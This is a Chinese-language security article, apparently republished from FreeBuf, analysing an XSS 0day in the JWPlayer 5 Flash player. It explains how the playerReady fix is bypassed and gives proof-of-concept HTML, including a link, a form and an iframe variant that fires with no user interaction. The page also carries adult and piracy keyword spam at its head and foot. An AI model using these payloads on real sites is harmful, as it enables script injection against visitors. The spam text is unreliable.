成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

JWPlayer 5最新SWF XSS 0day分析及POC改進

安全 漏洞
4月16號,國外公布了jwplayer一個未修復的XSS 0day。jwplayer是全球范圍內目前應用最廣泛的flash播放組件,特別是國外眾多在線愛情動作片網站。此前jwplayer曾爆出過一個XSS漏洞,影響非常廣泛。

4月16號,國外公布了jwplayer一個未修復的XSS 0day。jwplayer是全球范圍內目前應用最廣泛的flash播放組件,特別是國外眾多在線愛情動作片網站。此前jwplayer曾爆出過一個XSS漏洞,影響非常廣泛。

根據(jù)老外的描述,這次的問題主要是因為之前一個XSS漏洞沒有修復完全,導致bypass再利用。原始的問題是playerReady參數(shù)值未做過濾直接進入ExternalInterface.call導致可以執(zhí)行任意JS代碼。在經過官方的兩次小版本補丁后,這個問題最終的修復方案是禁止playerReady參數(shù)值中存在{}和()符號。而這種簡單的修復是可以被繞過的。

原文給出的POC:

<h2>Example 1:</h2>

<p>This example simply uses javascript:alert(1) as the value in window.name</p>

<p><a target="javascript:alert(1)" href="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b">Click Me</a></p>

JWPlayer 5最新SWF XSS 0day分析及POC改進

這里用到了兩個特性,一個是a標簽target的framename,一個是window.name的跨域傳遞的特性。在a等其他可以使用的target屬性的標簽中我們常用的是_blank,_parent,_self,_top四個值,而framename我們很少用到。framename相當于指定一個窗口的名稱并將文檔重定向到該窗口中進行處理,因此framename就相當于window.name。

這個POC就在a標簽中用javascript:alert(1)偽協(xié)議作為了framename,漏洞URL指定location為window.name也就觸發(fā)了url。我們同樣可以用form等其他支持target屬性的標簽來構造poc:

<form action="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b" method="post" target="javascript:alert(1)">

<button type="submit">登錄</button>

</form>

但這種POC是需要交互的,就比較雞肋了,其實我們可以改進成不需要用戶交互的形式。既然framename是窗口的名稱,那我們可以直接使用iframe并指定name為javascript:alert(1)。

<iframe name="javascript:alert(document.domain)"

src="http://player.longtailvideo.com/player.swf?playerReady=document.location=window.name%2b%27//%27%2b">

</iframe>

JWPlayer 5最新SWF XSS 0day分析及POC改進

這樣我們的POC就可以自動觸發(fā)了。

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2009-07-22 16:20:24

2015-02-05 15:58:06

2011-08-26 11:44:01

2009-07-06 13:15:07

2015-05-20 16:34:14

2015-07-14 10:53:19

Hacking Tea0Day漏洞

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2024-07-31 08:46:10

2015-07-08 10:35:17

2021-10-06 13:48:50

0day漏洞攻擊

2011-10-24 16:26:06

2015-07-08 13:52:18

2013-05-24 14:02:42

2022-03-25 13:41:55

漏洞網絡攻擊Quantum(量子

2011-10-24 16:15:16

2013-11-11 10:27:14

2013-11-11 17:13:05

2010-01-20 16:13:15

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2021-07-14 17:17:45

0day漏洞惡意代碼
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品1区2区3区 中文字幕一区二区三区四区 | 超碰综合 | 午夜免费在线电影 | 中国一级大毛片 | 91久久久久 | 久久r精品| 久久亚洲国产 | 国产黄色精品在线观看 | 久久久久亚洲精品国产 | 久久国产精品视频 | 国产伦一区二区三区久久 | 午夜精品久久久久99蜜 | 亚洲欧美bt| 欧美亚洲第一区 | 欧美成年黄网站色视频 | 免费a级毛片在线播放 | 中文字幕成人网 | 亚洲一级淫片 | 国产精品永久 | 九色视频网站 | 亚洲精品www | 日本一区二区三区四区 | 日韩精品一区二区三区中文字幕 | 欧美a在线观看 | www.com久久久 | 天天躁天天操 | 欧美日韩国产精品一区二区 | 午夜免费在线观看 | 亚洲一区二区精品 | 逼逼网 | 久久av一区二区三区 | 亚洲最新在线 | 在线观看免费av片 | 国产一区二区不卡 | 欧美精品久久久久久久久老牛影院 | 久草免费在线视频 | 91久久| 久久久亚洲一区 | 91久久久久 | 性天堂网| 特黄视频|